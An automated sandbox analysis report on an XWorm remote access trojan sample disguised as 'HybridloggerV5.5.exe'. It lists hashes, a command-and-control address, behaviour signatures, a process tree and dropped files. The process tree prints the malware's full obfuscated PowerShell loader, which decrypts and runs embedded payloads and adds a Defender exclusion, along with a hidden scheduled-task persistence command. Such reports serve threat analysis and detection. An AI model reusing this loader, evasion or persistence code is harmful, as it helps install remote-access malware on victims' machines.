Resubmissions

22-01-2025 00:02

250122-abvbvaxpht 10

21-01-2025 23:59

250121-318jzsyjfq 10

Analysis

  • max time kernel
    79s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22-01-2025 00:02

General

  • Target

    HybridloggerV5.5.exe

  • Size

    937KB

  • MD5

    c9314841cdbf8522e9ee925039d3bfb7

  • SHA1

    1b851459626862fdae6bdc0dd30aadf7a0f905ee

  • SHA256

    9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7

  • SHA512

    fb6e8ed3ccae472e19b95f9a1a08968fea7a6457b8d30a35d5f49f466fdf34d321c4cc0d427e753a9063d88456277e8c1d592c5ec1413c96593938b4be778bd0

  • SSDEEP

    24576:61P4yldcwy+Q4sUTB95/MbGkR/ntFdHZknwaIZ1cSsDrM:YP4yj4+Q4sUTB95/MbGkfFdmnwanpM

Malware Config

Extracted

Family

xworm

C2

193.161.193.99:24469

Attributes
  • Install_directory

    %Temp%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe
    "C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1432
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4468
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
        PID:648
      • C:\Windows\system32\findstr.exe
        findstr /C:"trey" banned_users.txt
        3⤵
        PID:1372
      • C:\Windows\system32\findstr.exe
        findstr /C:"trey gang" users.txt
        3⤵
        PID:1740
      • C:\Windows\system32\findstr.exe
        findstr /C:"EXI" banned_users.txt
        3⤵
        PID:4316
      • C:\Windows\system32\findstr.exe
        findstr /C:"EXI gang" users.txt
        3⤵
        PID:1960
      • C:\Windows\system32\findstr.exe
        findstr /C:"trey" banned_users.txt
        3⤵
        PID:2460
      • C:\Windows\system32\findstr.exe
        findstr /C:"trey gang" users.txt
        3⤵
        PID:2076
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4796
      • C:\Windows\system32\net.exe
        net file
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2152
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 file
          4⤵
          PID:3764
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3980
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_661_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_661.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3620
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_661.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4252
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_661.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:964
            • C:\Windows\system32\net.exe
              net file
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4600
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                7⤵
                PID:2768
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Roaming\startup_str_661.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Drops startup file
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of SetWindowsHookEx
              PID:5020
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1764
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff97d1046f8,0x7ff97d104708,0x7ff97d104718
      2⤵
      PID:1340
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
      2⤵
      PID:1244
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
      2⤵
      PID:1908
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
      2⤵
      PID:4252
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
      2⤵
      PID:2688
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
      2⤵
      PID:3616
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1
      2⤵
      PID:680
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
      2⤵
      PID:1128
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
      2⤵
      PID:2084
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
      2⤵
      PID:2736
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:1
      2⤵
      PID:2116
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1
      2⤵
      PID:3880
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
      2⤵
      PID:4564
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
      2⤵
      PID:1128
    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
      2⤵
      PID:224
    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
      2⤵
      PID:1032
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1980,17216799169940506804,3865302348952935018,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5592 /prefetch:8
      2⤵
      PID:5004
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:2096
  • C:\Windows\System32\CompPkgSrv.exe
    C:\Windows\System32\CompPkgSrv.exe -Embedding
    1⤵
    PID:4712

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize
      3KB
    MD5
      661739d384d9dfd807a089721202900b
    SHA1
      5b2c5d6a7122b4ce849dc98e79a7713038feac55
    SHA256
      70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
    SHA512
      81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
    Filesize
      152B
    MD5
      36988ca14952e1848e81a959880ea217
    SHA1
      a0482ef725657760502c2d1a5abe0bb37aebaadb
    SHA256
      d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6
    SHA512
      d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
    Filesize
      152B
    MD5
      fab8d8d865e33fe195732aa7dcb91c30
    SHA1
      2637e832f38acc70af3e511f5eba80fbd7461f2c
    SHA256
      1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea
    SHA512
      39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
    Filesize
      64KB
    MD5
      d6b36c7d4b06f140f860ddc91a4c659c
    SHA1
      ccf16571637b8d3e4c9423688c5bd06167bfb9e9
    SHA256
      34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92
    SHA512
      2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
    Filesize
      70KB
    MD5
      3b06aa689e8bf1aed00d923a55cfdd49
    SHA1
      ca186701396ba24d747438e6de95397ed5014361
    SHA256
      cd1569510154d7fa83732ccf69e41e833421f4e5ec7f70a5353ad07940ec445c
    SHA512
      0422b94ec68439a172281605264dede7b987804b3acfdeeb86ca7b12249e0bd90e8e625f9549a9635165034b089d59861260bedf7676f9fa68c5b332123035ed

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
    Filesize
      5KB
    MD5
      b03866b909d9327ae91f879672d272f6
    SHA1
      8c59f4fbaed4cc3f90cad25f0eb1be86a70ff2d9
    SHA256
      832d4ba56984cff8929769f4c3714ad4b4eaafa2f41068366a79ea1007f30f97
    SHA512
      d0ccd88779b4a3c22bcfef46e5c74c9c54db78afc1d20d906d8cd7524fc31cd4560b7dbcd93040f9e0fa0b6c6aa662c42afcbbd4c5b992b88cca782e514c1728

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
    Filesize
      6KB
    MD5
      82309835685f350011c7dd3b672af3ea
    SHA1
      6c546b5cbe1938b3f58867c7cd0d1d099fb2b433
    SHA256
      8c8f93d75b6182b69aaff8785594589986bd319d61f6551e39b1c47fd347e122
    SHA512
      e49792d546bcf59e4287af09d2e23b2b9327216a20740f180950980761b0ffbaa306d67130e2f57209cf764371162f2cc86b10a01dc8eb05cb208fec9a16e3a4

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
    Filesize
      16B
    MD5
      6752a1d65b201c13b62ea44016eb221f
    SHA1
      58ecf154d01a62233ed7fb494ace3c3d4ffce08b
    SHA256
      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
    SHA512
      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
    Filesize
      10KB
    MD5
      94091f879c2adb78126f13a82dfcd01b
    SHA1
      4e094175e5e787c96306e0bca3b33b09afcd7232
    SHA256
      bb352d30c8df366329e07bd920588d0b64bca7824137e6e87b062913e9f01aaf
    SHA512
      f8b76e243deeb070512d31a8c45772e482cb8e0feb93654c9892eeae03951280de0b43434089c711a86126742781487a10085cbf5f9fac1c47c57dde764123ff

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize
      1KB
    MD5
      dbbf71e9fb59f80938f09809b160e441
    SHA1
      8b9a517d846cb9a0a284f77ed88328236a85055f
    SHA256
      e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

                                                            SHA512

                                                            90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

                                                          • C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat

                                                            Filesize

                                                            12KB

                                                            MD5

                                                            89a22d3791ca38666c8144725a74497d

                                                            SHA1

                                                            96b672089a3c783e4dd27e8da7c0cc1245d55cfd

                                                            SHA256

                                                            9326ad90526504bfbc876646087bf41a82128fd5d995f624b13ea7ef3e154b94

                                                            SHA512

                                                            6b73d4fde3a673be8ea4aa169382b8aed1577817193545666a18cc83e918a642adf464090f2c1938b0f75f322e8e18e5304bf15c8eda71b4c072aaea5c294b2e

                                                          • C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat

                                                            Filesize

                                                            910KB

                                                            MD5

                                                            72ecd938d114e246eeebc8ae430fc2e9

                                                            SHA1

                                                            9ece59be22ceadcb3951093483cc69a76658801d

                                                            SHA256

                                                            4eafc8d12d2e402d7de955ffa3940c070d40dea9f2eda1260962518204304f65

                                                            SHA512

                                                            d2839e5226f9753f5098072b5cb7ab0f30318f3255355ae69fc75efc0ecfced89eb74788716b01a511e2461fa1c21052a336c1873aa82ef411cb710c4f14059e

                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gup0p1vt.y3c.ps1

                                                            Filesize

                                                            60B

                                                            MD5

                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                            SHA1

                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                            SHA256

                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                            SHA512

                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                          • C:\Users\Admin\AppData\Local\Temp\users.txt

                                                            Filesize

                                                            12B

                                                            MD5

                                                            e4d8e6c7a373e187a7f6d849cfc12ce6

                                                            SHA1

                                                            9e842363bd857128ca89fb150133197243e3ecb6

                                                            SHA256

                                                            b41cfb64e842114edef3951f4e65e92109f0e112be519b001fe92afef319a049

                                                            SHA512

                                                            00d8f1485e9dafa1ed33a61e9f2c3178683e2648bbb103a46d0514bc9c25123fbe1ce2f3ed2626e0590d07277114ca6ad64a3fc3ce942f819d2ac881de49bdd8

                                                          • C:\Users\Admin\AppData\Roaming\startup_str_661.vbs

                                                            Filesize

                                                            115B

                                                            MD5

                                                            e69ade7b74507cc1190cd507818038b6

                                                            SHA1

                                                            51d9aa84d28be188997966dbfd47eccb7c34f186

                                                            SHA256

                                                            1a5273c77b08d8753cdeac97f9ebebd3775607e107a3dcb9dcac02b9351f7f01

                                                            SHA512

                                                            6550bd4bc045a1c188bc395cc2450d44f99bc222eee03e57e581593277a061456d17371e8c01d4183c80e6dadfc64fe27c0fce3cc1cc8d33f36ea1de8f0a015a

                                                          • memory/1432-0-0x00007FF989863000-0x00007FF989865000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/1432-1-0x0000000000200000-0x00000000002F0000-memory.dmp

                                                            Filesize

                                                            960KB

                                                          • memory/3980-22-0x000001D175170000-0x000001D1751A8000-memory.dmp

                                                            Filesize

                                                            224KB

                                                          • memory/3980-21-0x000001D175140000-0x000001D175148000-memory.dmp

                                                            Filesize

                                                            32KB

                                                          • memory/3980-16-0x000001D174EF0000-0x000001D174F12000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/5020-53-0x000001FBFDE10000-0x000001FBFDE26000-memory.dmp

                                                            Filesize

                                                            88KB